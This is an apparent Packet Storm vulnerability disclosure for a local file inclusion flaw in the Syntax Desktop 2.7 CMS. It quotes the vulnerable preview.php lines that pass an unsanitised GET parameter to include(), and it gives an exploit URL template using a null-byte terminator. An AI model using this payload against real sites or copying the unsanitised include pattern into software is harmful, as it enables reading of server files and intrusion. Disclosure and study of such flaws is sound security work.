Syntax Desktop 2.7 Local File Inclusion

2009-02-04T00:00:00
ID PACKETSTORM:74634
Type packetstorm
Reporter ahmadbady
Modified 2009-02-04T00:00:00

Description

                                        
                                            ` -----------------:local File Include:-----------------  
-------------------------------------------------------  
script: syntax-desktop 2-7  
  
------------------------------------------------------------------  
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0  
  
  
------------------------------------------------------------------  
........................................................  
vul: /admin/modules/aa/preview.php  
  
line 42 $target=$_GET["synTarget"];  
ob_start();  
line 44 include("../../../$target");  
  
-----------------------------------------------------  
-----------------------------------------------------  
  
xpl:  
  
http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00  
  
  
***************************************************  
***************************************************  
---------------------------------------------------  
Author: ahmadbady [kivi_hacker666@yahoo.com]  
---------------------------------------------------  
  
  
`